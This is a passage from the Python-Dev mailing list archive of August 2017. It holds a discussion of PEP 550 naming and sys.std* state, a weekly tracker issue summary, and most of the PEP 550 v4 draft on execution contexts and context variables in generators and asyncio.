-0600 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: <20170825122808.59dd6a6f@fsol> Message-ID: On Fri, Aug 25, 2017 at 8:18 AM, Yury Selivanov wrote: > Another idea: > > 1. We alter PyModule to make it possible to add properties (descriptor > protocol, or we implement custom __getattr__). I think we can make it > so that only sys module would be able to actually use it, so it's not > going to be a new feature -- just a hack for CPython. FWIW, I've been toying with a similar problem and solution for a while. I'd like to clean up the sys module, including grouping some of the attributes (e.g. the import state), turn the get/set pairs into properties, and deprecate direct usage of some of the attributes. Though supporting descriptors on module objects would work [1] and be useful (particularly deprecating module attrs), it's sufficiently worthy of a PEP that I haven't taken the time. Instead, the approach I settled on was to rename sys to _sys and add a sys written in Python that proxies _sys. Here's a rough first pass: https://github.com/ericsnowcurrently/cpython/tree/sys-module It's effectively the same thing as ModuleType supporting descriptors, but specific only to sys. One problem with both approaches is that we'd be changing the type of the sys module. There's a relatively common idiom in the stdlib (and elsewhere) of using "type(sys)" to get ModuleType. Changing the type of the sys module breaks that. -eric [1] This is doable with a custom __getattribute__ on ModuleType, though it will impact attribute lookup on all modules. I suppose there could be a subclass that does the right thing... Anyway, this is more python-ideas territory. From yselivanov.ml at gmail.com Fri Aug 25 11:30:12 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Fri, 25 Aug 2017 11:30:12 -0400 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: <638C37AA-1E55-46DC-9017-4E94B222F89C@python.org> References: <20170825122808.59dd6a6f@fsol> <638C37AA-1E55-46DC-9017-4E94B222F89C@python.org> Message-ID: On Fri, Aug 25, 2017 at 11:10 AM, Barry Warsaw wrote: [..] > It?s ideas like this that do make me think of scopes when talking about global state and execution contexts. I understand that the current PEP 550 invokes an explicit separate namespace, but thinking bigger, if the usual patterns of just writing to sys.std{out,err} still worked and in the presence of single ?threaded? execution it just did the normal thing, but in the presence of threads, async, etc. it *also* did the right thing, then code wouldn?t need to change just because you started to adopt async. That implies some scoping rules to make ?sys.stdout? refer to the local execution?s sys.stdout if it were set, and the global sys.stdout if it were not. The problem here is exactly the "usual patterns of just writing to sys.std{out,err}". The usual pattern assumes that it's a global variable, and there are no ways of getting around this. None. There are many applications out there that are already written with the assumption that setting sys.stdout changes it for all threads, which means that we cannot change this already established semantics. The sys.std* API just needs to be slowly deprecated and replaced with a new API that uses context managers and does things differently under the hood, *if* and only if, we all agree that we even need to solve this problem. This is a completely separate problem from the one that PEP 550 solves, which is providing a better TLS that is aware of generators and async code. Yury From ericsnowcurrently at gmail.com Fri Aug 25 11:33:15 2017 From: ericsnowcurrently at gmail.com (Eric Snow) Date: Fri, 25 Aug 2017 09:33:15 -0600 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: <638C37AA-1E55-46DC-9017-4E94B222F89C@python.org> References: <20170825122808.59dd6a6f@fsol> <638C37AA-1E55-46DC-9017-4E94B222F89C@python.org> Message-ID: On Fri, Aug 25, 2017 at 9:10 AM, Barry Warsaw wrote: > It?s ideas like this that do make me think of scopes when talking about global state and execution contexts. I understand that the current PEP 550 invokes an explicit separate namespace, Right. The observation that PEP 550 proposes a separate stack of scopes from the lexical scope is an important one. > but thinking bigger, if the usual patterns of just writing to sys.std{out,err} still worked and in the presence of single ?threaded? execution it just did the normal thing, but in the presence of threads, async, etc. it *also* did the right thing, then code wouldn?t need to change just because you started to adopt async. That implies some scoping rules to make ?sys.stdout? refer to the local execution?s sys.stdout if it were set, and the global sys.stdout if it were not. Yeah, at the bottom of the PEP 550 stack there'd need to be a proxy to the relevant global state. While working on the successor to PEP 406 (import state), I realized I'd need something like this. > > This would of course be a much deeper change to Python, with lots of tricky semantics and corner cases to get right. But it might be worth it to provide an execution model and an API that would be harder to get wrong because Python just Does the Right Thing. It?s difficult because you also have to be able to reason about what?s going on, and it?ll be imperative to be able to debug and examine the state of your execution when things go unexpected. That?s always harder when mixing dynamic scope with lexical scope, which I think is what PEP 550 is ultimately getting at. +1 Thankfully, PEP 550 is targeted more at a subset of library authors than at the general population. -eric From guido at python.org Fri Aug 25 11:41:47 2017 From: guido at python.org (Guido van Rossum) Date: Fri, 25 Aug 2017 08:41:47 -0700 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: <20170825122808.59dd6a6f@fsol> <638C37AA-1E55-46DC-9017-4E94B222F89C@python.org> Message-ID: I think the issue with sys.std* is a distraction for this discussion. The issue also seems overstated, and I wouldn't want to change it. The ability to set these is mostly used in small programs that are also single-threaded. Libraries should never mess with them -- it's easy to explicitly pass an output file around, and for errors you should use logging or in a pinch you can write to sys.stderr, but you shouldn't set it. -- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed... URL: From status at bugs.python.org Fri Aug 25 12:09:17 2017 From: status at bugs.python.org (Python tracker) Date: Fri, 25 Aug 2017 18:09:17 +0200 (CEST) Subject: [Python-Dev] Summary of Python tracker Issues Message-ID: <20170825160917.F24D356B7C@psf.upfronthosting.co.za> ACTIVITY SUMMARY (2017-08-18 - 2017-08-25) Python tracker at http://bugs.python.org/ To view or respond to any of the issues listed below, click on the issue. Do NOT respond to this message. Issues counts and deltas: open 6149 (+16) closed 36880 (+28) total 43029 (+44) Open issues with patches: 2342 Issues opened (28) ================== #30871: Add test.pythoninfo http://bugs.python.org/issue30871 reopened by haypo #31233: socketserver.ThreadingMixIn leaks running threads after server http://bugs.python.org/issue31233 opened by haypo #31234: Make support.threading_cleanup() stricter http://bugs.python.org/issue31234 opened by haypo #31237: test_gdb disables 25% of tests in optimized builds http://bugs.python.org/issue31237 opened by lukasz.langa #31241: ast col_offset wrong for list comprehensions, generators and t http://bugs.python.org/issue31241 opened by samuelcolvin #31242: Add SSLContext.set_verify_callback() http://bugs.python.org/issue31242 opened by rfinnie #31243: checks whether PyArg_ParseTuple returned a negative int http://bugs.python.org/issue31243 opened by Oren Milman #31244: IDLE: work around shortcuts bug in Windows' IMEs and tk http://bugs.python.org/issue31244 opened by Constantine Ketskalo #31245: Asyncio UNIX socket and SOCK_DGRAM http://bugs.python.org/issue31245 opened by qdawans #31246: [2.7] test_signal.test_setitimer_tiny() fails randomly on x86- http://bugs.python.org/issue31246 opened by haypo #31248: method wrapper type has invalid __name__/__qualname__ 'method- http://bugs.python.org/issue31248 opened by bup #31249: test_concurrent_futures leaks dangling threads http://bugs.python.org/issue31249 opened by haypo #31250: test_asyncio leaks dangling threads http://bugs.python.org/issue31250 opened by haypo #31252: Operator.itemgetter documentation should include dictionary ke http://bugs.python.org/issue31252 opened by ashishnitinpatil #31254: WeakKeyDictionary/Mapping doesn't call __missing__ http://bugs.python.org/issue31254 opened by Antony.Lee #31256: xml.etree.ElementTree: add support for doctype in tostring met http://bugs.python.org/issue31256 opened by bastik #31258: [2.7] Enhance support reap_children() and threading_cleanup() http://bugs.python.org/issue31258 opened by haypo #31259: [3.6] Enhance support reap_children() and threading_cleanup() http://bugs.python.org/issue31259 opened by haypo #31260: [2.7] Enhance PC/VS9.0/ project to produce python.bat, as PCbu http://bugs.python.org/issue31260 opened by haypo #31265: Remove doubly-linked list from C OrderedDict http://bugs.python.org/issue31265 opened by inada.naoki #31267: threading.Timer object is affected by changes to system time http://bugs.python.org/issue31267 opened by winfreak #31270: Simplify documentation of itertools.zip_longest http://bugs.python.org/issue31270 opened by rami #31271: an assertion failure in io.TextIOWrapper.write http://bugs.python.org/issue31271 opened by Oren Milman #31272: typing module conflicts with __slots__-classes http://bugs.python.org/issue31272 opened by grayfall #31273: Unicode support in TestCase.skip http://bugs.python.org/issue31273 opened by Nathan Buckner #31274: Support building against homebrew on macOS http://bugs.python.org/issue31274 opened by barry #31275: Check fall-through in _codecs_iso2022.c http://bugs.python.org/issue31275 opened by skrah #31276: PyObject_CallFinalizerFromDealloc is undocumented http://bugs.python.org/issue31276 opened by pv Most recent 15 issues with no replies (15) ========================================== #31276: PyObject_CallFinalizerFromDealloc is undocumented http://bugs.python.org/issue31276 #31273: Unicode support in TestCase.skip http://bugs.python.org/issue31273 #31272: typing module conflicts with __slots__-classes http://bugs.python.org/issue31272 #31267: threading.Timer object is affected by changes to system time http://bugs.python.org/issue31267 #31260: [2.7] Enhance PC/VS9.0/ project to produce python.bat, as PCbu http://bugs.python.org/issue31260 #31256: xml.etree.ElementTree: add support for doctype in tostring met http://bugs.python.org/issue31256 #31250: test_asyncio leaks dangling threads http://bugs.python.org/issue31250 #31248: method wrapper type has invalid __name__/__qualname__ 'method- http://bugs.python.org/issue31248 #31245: Asyncio UNIX socket and SOCK_DGRAM http://bugs.python.org/issue31245 #31242: Add SSLContext.set_verify_callback() http://bugs.python.org/issue31242 #31241: ast col_offset wrong for list comprehensions, generators and t http://bugs.python.org/issue31241 #31224: Missing definition of frozen module http://bugs.python.org/issue31224 #31207: IDLE, configdialog: Factor out ExtPage class from ConfigDialog http://bugs.python.org/issue31207 #31202: Windows pathlib.Path.glob(pattern) fixed part of the pattern c http://bugs.python.org/issue31202 #31196: Blank line inconsistency between InteractiveConsole and standa http://bugs.python.org/issue31196 Most recent 15 issues waiting for review (15) ============================================= #31270: Simplify documentation of itertools.zip_longest http://bugs.python.org/issue31270 #31185: Miscellaneous errors in asyncio speedup module http://bugs.python.org/issue31185 #31184: Fix data descriptor detection in inspect.getattr_static http://bugs.python.org/issue31184 #31179: Speed-up dict.copy() up to 5.5 times. http://bugs.python.org/issue31179 #31178: [EASY] subprocess: TypeError: can't concat str to bytes, in _e http://bugs.python.org/issue31178 #31175: Exception while extracting file from ZIP with non-matching fil http://bugs.python.org/issue31175 #31151: socketserver.ForkingMixIn.server_close() leaks zombie processe http://bugs.python.org/issue31151 #31120: [2.7] Python 64 bit _ssl compile fails due missing buildinf_am http://bugs.python.org/issue31120 #31113: Stack overflow with large program http://bugs.python.org/issue31113 #31108: add __contains__ for list_iterator (and others) for better per http://bugs.python.org/issue31108 #31106: os.posix_fallocate() generate exception with errno 0 http://bugs.python.org/issue31106 #31046: ensurepip does not honour the value of $(prefix) http://bugs.python.org/issue31046 #31021: Clarify programming faq. http://bugs.python.org/issue31021 #31020: Add support for custom compressor in tarfile http://bugs.python.org/issue31020 #31015: PyErr_WriteUnraisable should be more verbose in Python 2.7 http://bugs.python.org/issue31015 Top 10 most discussed issues (10) ================================= #31234: Make support.threading_cleanup() stricter http://bugs.python.org/issue31234 13 msgs #31095: Checking all tp_dealloc with Py_TPFLAGS_HAVE_GC http://bugs.python.org/issue31095 11 msgs #31244: IDLE: work around shortcuts bug in Windows' IMEs and tk http://bugs.python.org/issue31244 11 msgs #31254: WeakKeyDictionary/Mapping doesn't call __missing__ http://bugs.python.org/issue31254 11 msgs #14976: queue.Queue() is not reentrant, so signals and GC can cause de http://bugs.python.org/issue14976 8 msgs #31265: Remove doubly-linked list from C OrderedDict http://bugs.python.org/issue31265 8 msgs #27099: IDLE: turn builting extensions into regular modules http://bugs.python.org/issue27099 7 msgs #30871: Add test.pythoninfo http://bugs.python.org/issue30871 7 msgs #31271: an assertion failure in io.TextIOWrapper.write http://bugs.python.org/issue31271 6 msgs #28261: wrong error messages when using PyArg_ParseTuple to parse norm http://bugs.python.org/issue28261 5 msgs Issues closed (27) ================== #28777: Add asyncio.Queue __aiter__, __anext__ methods http://bugs.python.org/issue28777 closed by gvanrossum #30923: Add -Wimplicit-fallthrough=0 to Makefile ? http://bugs.python.org/issue30923 closed by skrah #31024: typing.Tuple is class but is defined as data inside https://do http://bugs.python.org/issue31024 closed by levkivskyi #31109: zipimport argument clinic conversion http://bugs.python.org/issue31109 closed by brett.cannon #31118: Make super() work with staticmethod by using __class__ for bot http://bugs.python.org/issue31118 closed by ncoghlan #31161: Only check for print and exec parentheses cases for SyntaxErro http://bugs.python.org/issue31161 closed by lukasz.langa #31183: `Dis` module doesn't know how to disassemble async generator o http://bugs.python.org/issue31183 closed by ncoghlan #31206: IDLE, configdialog: Factor out HighPage class from ConfigDialo http://bugs.python.org/issue31206 closed by terry.reedy #31229: wrong error messages when too many kwargs are received http://bugs.python.org/issue31229 closed by serhiy.storchaka #31232: Backport the new custom "print >> sys.stderr" error message? http://bugs.python.org/issue31232 closed by ncoghlan #31235: test_logging: ResourceWarning: unclosed http://bugs.python.org/issue31235 closed by haypo #31236: improve some error messages of min() and max() http://bugs.python.org/issue31236 closed by serhiy.storchaka #31238: pydoc: ServerThread.stop() leaves a dangling thread http://bugs.python.org/issue31238 closed by haypo #31239: namedtuple comparison ignores types http://bugs.python.org/issue31239 closed by r.david.murray #31240: Add lazy evaluation support for dict.setdefault() http://bugs.python.org/issue31240 closed by serhiy.storchaka #31247: test_xmlrpc leaks dangling threads http://bugs.python.org/issue31247 closed by haypo #31251: Diameter protocol in Python http://bugs.python.org/issue31251 closed by serhiy.storchaka #31253: Python fails to parse triple quoted (commented out) code http://bugs.python.org/issue31253 closed by quamrana #31255: Test getrandom before using it http://bugs.python.org/issue31255 closed by heroxbd #31257: importlib race condition http://bugs.python.org/issue31257 closed by haypo #31261: unittest fails to properly destruct objects created during set http://bugs.python.org/issue31261 closed by r.david.murray #31262: Documentation Error http://bugs.python.org/issue31262 closed by r.david.murray #31263: Assigning to subscript/slice of literal is permitted http://bugs.python.org/issue31263 closed by r.david.murray #31264: Import Package/Module through HTTP/S repository http://bugs.python.org/issue31264 closed by r.david.murray #31266: attribute error http://bugs.python.org/issue31266 closed by nixster #31268: Inconsistent socket timeout exception http://bugs.python.org/issue31268 closed by desbma #31269: bug in islink() and is_symlink() http://bugs.python.org/issue31269 closed by r.david.murray From yselivanov.ml at gmail.com Fri Aug 25 18:32:22 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Fri, 25 Aug 2017 18:32:22 -0400 Subject: [Python-Dev] PEP 550 v4 Message-ID: Hi, This is the 4th iteration of the PEP that Elvis and I have rewritten from scratch. The specification section has been separated from the implementation section, which makes them easier to follow. During the rewrite, we realized that generators and coroutines should work with the EC in exactly the same way (coroutines used to be created with no LC in prior versions of the PEP). We also renamed Context Keys to Context Variables which seems to be a more appropriate name. Hopefully this update will resolve the remaining questions about the specification and the proposed implementation, and will allow us to focus on refining the API. Yury PEP: 550 Title: Execution Context Version: $Revision$ Last-Modified: $Date$ Author: Yury Selivanov , Elvis Pranskevichus Status: Draft Type: Standards Track Content-Type: text/x-rst Created: 11-Aug-2017 Python-Version: 3.7 Post-History: 11-Aug-2017, 15-Aug-2017, 18-Aug-2017, 25-Aug-2017 Abstract ======== This PEP adds a new generic mechanism of ensuring consistent access to non-local state in the context of out-of-order execution, such as in Python generators and coroutines. Thread-local storage, such as ``threading.local()``, is inadequate for programs that execute concurrently in the same OS thread. This PEP proposes a solution to this problem. Rationale ========= Prior to the advent of asynchronous programming in Python, programs used OS threads to achieve concurrency. The need for thread-specific state was solved by ``threading.local()`` and its C-API equivalent, ``PyThreadState_GetDict()``. A few examples of where Thread-local storage (TLS) is commonly relied upon: * Context managers like decimal contexts, ``numpy.errstate``, and ``warnings.catch_warnings``. * Request-related data, such as security tokens and request data in web applications, language context for ``gettext`` etc. * Profiling, tracing, and logging in large code bases. Unfortunately, TLS does not work well for programs which execute concurrently in a single thread. A Python generator is the simplest example of a concurrent program. Consider the following:: def fractions(precision, x, y): with decimal.localcontext() as ctx: ctx.prec = precision yield Decimal(x) / Decimal(y) yield Decimal(x) / Decimal(y**2) g1 = fractions(precision=2, x=1, y=3) g2 = fractions(precision=6, x=2, y=3) items = list(zip(g1, g2)) The expected value of ``items`` is:: [(Decimal('0.33'), Decimal('0.666667')), (Decimal('0.11'), Decimal('0.222222'))] Rather surprisingly, the actual result is:: [(Decimal('0.33'), Decimal('0.666667')), (Decimal('0.111111'), Decimal('0.222222'))] This is because Decimal context is stored as a thread-local, so concurrent iteration of the ``fractions()`` generator would corrupt the state. A similar problem exists with coroutines. Applications also often need to associate certain data with a given thread of execution. For example, a web application server commonly needs access to the current HTTP request object. The inadequacy of TLS in asynchronous code has lead to the proliferation of ad-hoc solutions, which are limited in scope and do not support all required use cases. The current status quo is that any library (including the standard library), which relies on TLS, is likely to be broken when used in asynchronous code or with generators (see [3]_ as an example issue.) Some languages, that support coroutines or generators, recommend passing the context manually as an argument to every function, see [1]_ for an example. This approach, however, has limited use for Python, where there is a large ecosystem that was built to work with a TLS-like context. Furthermore, libraries like ``decimal`` or ``numpy`` rely on context implicitly in overloaded operator implementations. The .NET runtime, which has support for async/await, has a generic solution for this problem, called ``ExecutionContext`` (see [2]_). Goals ===== The goal of this PEP is to provide a more reliable ``threading.local()`` alternative, which: * provides the mechanism and the API to fix non-local state issues with coroutines and generators; * has no or negligible performance impact on the existing code or the code that will be using the new mechanism, including libraries like ``decimal`` and ``numpy``. High-Level Specification ======================== The full specification of this PEP is broken down into three parts: * High-Level Specification (this section): the description of the overall solution. We show how it applies to generators and coroutines in user code, without delving into implementation details. * Detailed Specification: the complete description of new concepts, APIs, and related changes to the standard library. * Implementation Details: the description and analysis of data structures and algorithms used to implement this PEP, as well as the necessary changes to CPython. For the purpose of this section, we define *execution context* as an opaque container of non-local state that allows consistent access to its contents in the concurrent execution environment. A *context variable* is an object representing a value in the execution context. A new context variable is created by calling the ``new_context_var()`` function. A context variable object has two methods: * ``lookup()``: returns the value of the variable in the current execution context; * ``set()``: sets the value of the variable in the current execution context. Regular Single-threaded Code ---------------------------- In regular, single-threaded code that doesn't involve generators or coroutines, context variables behave like globals:: var = new_context_var() def sub(): assert var.lookup() == 'main' var.set('sub') def main(): var.set('main') sub() assert var.lookup() == 'sub' Multithreaded Code ------------------ In multithreaded code, context variables behave like thread locals:: var = new_context_var() def sub(): assert var.lookup() is None # The execution context is empty # for each new thread. var.set('sub') def main(): var.set('main') thread = threading.Thread(target=sub) thread.start() thread.join() assert var.lookup() == 'main' Generators ---------- In generators, changes to context variables are local and are not visible to the caller, but are visible to the code called by the generator. Once set in the generator, the context variable is guaranteed not to change between iterations:: var = new_context_var() def gen(): var.set('gen') assert var.lookup() == 'gen' yield 1 assert var.lookup() == 'gen' yield 2 def main(): var.set('main') g = gen() next(g) assert var.lookup() == 'main' var.set('main modified') next(g) assert var.lookup() == 'main modified' Changes to caller's context variables are visible to the generator (unless they were also modified inside the generator):: var = new_context_var() def gen(): assert var.lookup() == 'var' yield 1 assert var.lookup() == 'var modified' yield 2 def main(): g = gen() var.set('var') next(g) var.set('var modified') next(g) Now, let's revisit the decimal precision example from the `Rationale`_ section, and see how the execution context can improve the situation:: import decimal decimal_prec = new_context_var() # create a new context variable # Pre-PEP 550 Decimal relies on TLS for its context. # This subclass switches the decimal context storage # to the execution context for illustration purposes. # class MyDecimal(decimal.Decimal): def __init__(self, value="0"): prec = decimal_prec.lookup() if prec is None: raise ValueError('could not find decimal precision') context = decimal.Context(prec=prec) super().__init__(value, context=context) def fractions(precision, x, y): # Normally, this would be set by a context manager, # but for simplicity we do this directly. decimal_prec.set(precision) yield MyDecimal(x) / MyDecimal(y) yield MyDecimal(x) / MyDecimal(y**2) g1 = fractions(precision=2, x=1, y=3) g2 = fractions(precision=6, x=2, y=3) items = list(zip(g1, g2)) The value of ``items`` is:: [(Decimal('0.33'), Decimal('0.666667')), (Decimal('0.11'), Decimal('0.222222'))] which matches the expected result. Coroutines and Asynchronous Tasks --------------------------------- In coroutines, like in generators, context variable changes are local and are not visible to the caller:: import asyncio var = new_context_var() async def sub(): assert var.lookup() == 'main' var.set('sub') assert var.lookup() == 'sub' async def main(): var.set('main') await sub() assert var.lookup() == 'main' loop = asyncio.get_event_loop() loop.run_until_complete(main()) To establish the full semantics of execution context in couroutines, we must also consider *tasks*. A task is the abstraction used by *asyncio*, and other similar libraries, to manage the concurrent execution of coroutines. In the example above, a task is created implicitly by the ``run_until_complete()`` function. ``asyncio.wait_for()`` is another example of implicit task creation:: async def sub(): await asyncio.sleep(1) assert var.lookup() == 'main' async def main(): var.set('main') # waiting for sub() directly await sub() # waiting for sub() with a timeout await asyncio.wait_for(sub(), timeout=2) var.set('main changed') Intuitively, we expect the assertion in ``sub()`` to hold true in both invocations, even though the ``wait_for()`` implementation actually spawns a task, which runs ``sub()`` concurrently with ``main()``. Thus, tasks **must** capture a snapshot of the current execution context at the moment of their creation and use it to execute the wrapped coroutine whenever that happens. If this is not done, then innocuous looking changes like wrapping a coroutine in a ``wait_for()`` call would cause surprising breakage. This leads to the following:: import asyncio var = new_context_var() async def sub(): # Sleeping will make sub() run after # `var` is modified in main(). await asyncio.sleep(1) assert var.lookup() == 'main' async def main(): var.set('main') loop.create_task(sub()) # schedules asynchronous execution # of sub(). assert var.lookup() == 'main' var.set('main changed') loop = asyncio.get_event_loop() loop.run_until_complete(main()) In the above code we show how ``sub()``, running in a separate task, sees the value of ``var`` as it was when ``loop.create_task(sub())`` was called. Like tasks, the intuitive behaviour of callbacks scheduled with either ``Loop.call_soon()``, ``Loop.call_later()``, or ``Future.add_done_callback()`` is to also capture a snapshot of the current execution context at the point of scheduling, and use it to run the callback:: current_request = new_context_var() def log_error(e): logging.error('error when handling request %r', current_request.lookup()) async def render_response(): ... async def handle_get_request(request): current_request.set(request) try: return await render_response() except Exception as e: get_event_loop().call_soon(log_error, e) return '500 - Internal Server Error' Detailed Specification ====================== Conceptually, an *execution context* (EC) is a stack of logical contexts. There is one EC per Python thread. A *logical context* (LC) is a mapping of context variables to their values in that particular LC. A *context variable* is an object representing a value in the execution context. A new context variable object is created by calling the ``sys.new_context_var(name: str)`` function. The value of the ``name`` argument is not used by the EC machinery, but may be used for debugging and introspection. The context variable object has the following methods and attributes: * ``name``: the value passed to ``new_context_var()``. * ``lookup()``: traverses the execution context top-to-bottom, until the variable value is found. Returns ``None``, if the variable is not present in the execution context; * ``set()``: sets the value of the variable in the topmost logical context. Generators ---------- When created, each generator object has an empty logical context object stored in its ``__logical_context__`` attribute. This logical context is pushed onto the execution context at the beginning of each generator iteration and popped at the end:: var1 = sys.new_context_var('var1') var2 = sys.new_context_var('var2') def gen(): var1.set('var1-gen') var2.set('var2-gen') # EC = [ # outer_LC(), # gen_LC({var1: 'var1-gen', var2: 'var2-gen'}) # ] n = nested_gen() # nested_gen_LC is created next(n) # EC = [ # outer_LC(), # gen_LC({var1: 'var1-gen', var2: 'var2-gen'}) # ] var1.set('var1-gen-mod') var2.set('var2-gen-mod') # EC = [ # outer_LC(), # gen_LC({var1: 'var1-gen-mod', var2: 'var2-gen-mod'}) # ] next(n) def nested_gen(): # EC = [ # outer_LC(), # gen_LC({var1: 'var1-gen', var2: 'var2-gen'}), # nested_gen_LC() # ] assert var1.lookup() == 'var1-gen' assert var2.lookup() == 'var2-gen' var1.set('var1-nested-gen') # EC = [ # outer_LC(), # gen_LC({var1: 'var1-gen', var2: 'var2-gen'}), # nested_gen_LC({var1: 'var1-nested-gen'}) # ] yield # EC = [ # outer_LC(), # gen_LC({var1: 'var1-gen-mod', var2: 'var2-gen-mod'}), # nested_gen_LC({var1: 'var1-nested-gen'}) # ] assert var1.lookup() == 'var1-nested-gen' assert var2.lookup() == 'var2-gen-mod' yield # EC = [outer_LC()] g = gen() # gen_LC is created for the generator object `g` list(g) # EC = [outer_LC()] The snippet above shows the state of the execution context stack throughout the generator lifespan. contextlib.contextmanager ------------------------- Earlier, we've used the following example:: import decimal # create a new context variable decimal_prec = sys.new_context_var('decimal_prec') # ... def fractions(precision, x, y): decimal_prec.set(precision) yield MyDecimal(x) / MyDecimal(y) yield MyDecimal(x) / MyDecimal(y**2) Let's extend it by adding a context manager:: @contextlib.contextmanager def precision_context(prec): old_rec = decimal_prec.lookup() try: decimal_prec.set(prec) yield finally: decimal_prec.set(old_prec) Unfortunately, this would not work straight away, as the modification to the ``decimal_prec`` variable is contained to the ``precision_context()`` generator, and therefore will not be visible inside the ``with`` block:: def fractions(precision, x, y): # EC = [{}, {}] with precision_context(precision): # EC becomes [{}, {}, {decimal_prec: precision}] in the # *precision_context()* generator, # but here the EC is still [{}, {}] # raises ValueError('could not find decimal precision')! yield MyDecimal(x) / MyDecimal(y) yield MyDecimal(x) / MyDecimal(y**2) The way to fix this is to set the generator's ``__logical_context__`` attribute to ``None``. This will cause the generator to avoid modifying the execution context stack. We modify the ``contextlib.contextmanager()`` decorator to set ``genobj.__logical_context__`` to ``None`` to produce well-behaved context managers:: def fractions(precision, x, y): # EC = [{}, {}] with precision_context(precision): # EC = [{}, {decimal_prec: precision}] yield MyDecimal(x) / MyDecimal(y) yield MyDecimal(x) / MyDecimal(y**2) # EC becomes [{}, {decimal_prec: None}] asyncio ------- ``asyncio`` uses ``Loop.call_soon``, ``Loop.call_later``, and ``Loop.call_at`` to schedule the asynchronous execution of a function. ``asyncio.Task`` uses ``call_soon()`` to further the execution of the wrapped coroutine. We modify ``Loop.call_{at,later,soon}`` to accept the new optional *execution_context* keyword argument, which defaults to the copy of the current execution context:: def call_soon(self, callback, *args, execution_context=None): if execution_context is None: execution_context = sys.get_execution_context() # ... some time later sys.run_with_execution_context( execution_context, callback, args) The ``sys.get_execution_context()`` function returns a shallow copy of the current execution context. By shallow copy here we mean such a new execution context that: * lookups in the copy provide the same results as in the original execution context, and * any changes in the original execution context do not affect the copy, and * any changes to the copy do not affect the original execution context. Either of the following satisfy the copy requirements: * a new stack with shallow copies of logical contexts; * a new stack with one squashed logical context. The ``sys.run_with_execution_context(ec, func, *args, **kwargs)`` function runs ``func(*args, **kwargs)`` with *ec* as the execution context. The function performs the following steps: 1. Set *ec* as the current execution context stack in the current thread. 2. Push an empty logical context onto the stack. 3. Run ``func(*args, **kwargs)``. 4. Pop the logical context from the stack. 5. Restore the original execution context stack. 6. Return or raise the ``func()`` result. These steps ensure that *ec* cannot be modified by *func*, which makes ``run_with_execution_context()`` idempotent. ``asyncio.Task`` is modified as follows:: class Task: def __init__(self, coro): ... # Get the current execution context snapshot. self._exec_context = sys.get_execution_context() self._loop.call_soon( self._step, execution_context=self._exec_context) def _step(self, exc=None): ... self._loop.call_soon( self._step, execution_context=self._exec_context) ... Generators Transformed into Iterators ------------------------------------- Any Python generator can be represented as an equivalent iterator. Compilers like Cython rely on this axiom. With respect to the execution context, such iterator should behave the same way as the generator it represents. This means that there needs to be a Python API to create new logical contexts and run code with a given logical context. The ``sys.new_logical_context()`` function creates a new empty logical context. The ``sys.run_with_logical_context(lc, func, *args, **kwargs)`` function can be used to run functions in the specified logical context. The *lc* can be modified as a result of the call. The ``sys.run_with_logical_context()`` function performs the following steps: 1. Push *lc* onto the current execution context stack. 2. Run ``func(*args, **kwargs)``. 3. Pop *lc* from the execution context stack. 4. Return or raise the ``func()`` result. By using ``new_logical_context()`` and ``run_with_logical_context()``, we can replicate the generator behaviour like this:: class Generator: def __init__(self): self.logical_context = sys.new_logical_context() def __iter__(self): return self def __next__(self): return sys.run_with_logical_context( self.logical_context, self._next_impl) def _next_impl(self): # Actual __next__ implementation. ... Let's see how this pattern can be applied to a real generator:: # create a new context variable decimal_prec = sys.new_context_var('decimal_precision') def gen_series(n, precision): decimal_prec.set(precision) for i in range(1, n): yield MyDecimal(i) / MyDecimal(3) # gen_series is equivalent to the following iterator: class Series: def __init__(self, n, precision): # Create a new empty logical context on creation, # like the generators do. self.logical_context = sys.new_logical_context() # run_with_logical_context() will pushes # self.logical_context onto the execution context stack, # runs self._next_impl, and pops self.logical_context # from the stack. return sys.run_with_logical_context( self.logical_context, self._init, n, precision) def _init(self, n, precision): self.i = 1 self.n = n decimal_prec.set(precision) def __iter__(self): return self def __next__(self): return sys.run_with_logical_context( self.logical_context, self._next_impl) def _next_impl(self): decimal_prec.set(self.precision) result = MyDecimal(self.i) / MyDecimal(3) self.i += 1 return result For regular iterators such approach to logical context management is normally not necessary, and it is recommended to set and restore context variables directly in ``__next__``:: class Series: def __next__(self): old_prec = decimal_prec.lookup() try: decimal_prec.set(self.precision) ... finally: decimal_prec.set(old_prec) Asynchronous Generators ----------------------- The execution context semantics in asynchronous generators does not differ from that of regular generators and coroutines. Implementation ============== Execution context is implemented as an immutable linked list of logical contexts, where each logical context is an immutable weak key mapping. A pointer to the currently active execution context is stored in the OS thread state:: +-----------------+ | | ec | PyThreadState +-------------+ | | | +-----------------+ | | ec_node ec_node ec_node v +------+------+ +------+------+ +------+------+ | NULL | lc |<----| prev | lc |<----| prev | lc | +------+--+---+ +------+--+---+ +------+--+---+ | | | LC v LC v LC v +-------------+ +-------------+ +-------------+ | var1: obj1 | | EMPTY | | var1: obj4 | | var2: obj2 | +-------------+ +-------------+ | var3: obj3 | +-------------+ The choice of the immutable list of immutable mappings as a fundamental data structure is motivated by the need to efficiently implement ``sys.get_execution_context()``, which is to be frequently used by asynchronous tasks and callbacks. When the EC is immutable, ``get_execution_context()`` can simply copy the current execution context *by reference*:: def get_execution_context(self): return PyThreadState_Get().ec Let's review all possible context modification scenarios: * The ``ContextVariable.set()`` method is called:: def ContextVar_set(self, val): # See a more complete set() definition # in the `Context Variables` section. tstate = PyThreadState_Get() top_ec_node = tstate.ec top_lc = top_ec_node.lc new_top_lc = top_lc.set(self, val) tstate.ec = ec_node( prev=top_ec_node.prev, lc=new_top_lc) * The ``sys.run_with_logical_context()`` is called, in which case the passed logical context object is appended to the execution context:: def run_with_logical_context(lc, func, *args, **kwargs): tstate = PyThreadState_Get() old_top_ec_node = tstate.ec new_top_ec_node = ec_node(prev=old_top_ec_node, lc=lc) try: tstate.ec = new_top_ec_node return func(*args, **kwargs) finally: tstate.ec = old_top_ec_node * The ``sys.run_with_execution_context()`` is called, in which case the current execution context is set to the passed execution context with a new empty logical context appended to it:: def run_with_execution_context(ec, func, *args, **kwargs): tstate = PyThreadState_Get() old_top_ec_node = tstate.ec new_lc = sys.new_logical_context() 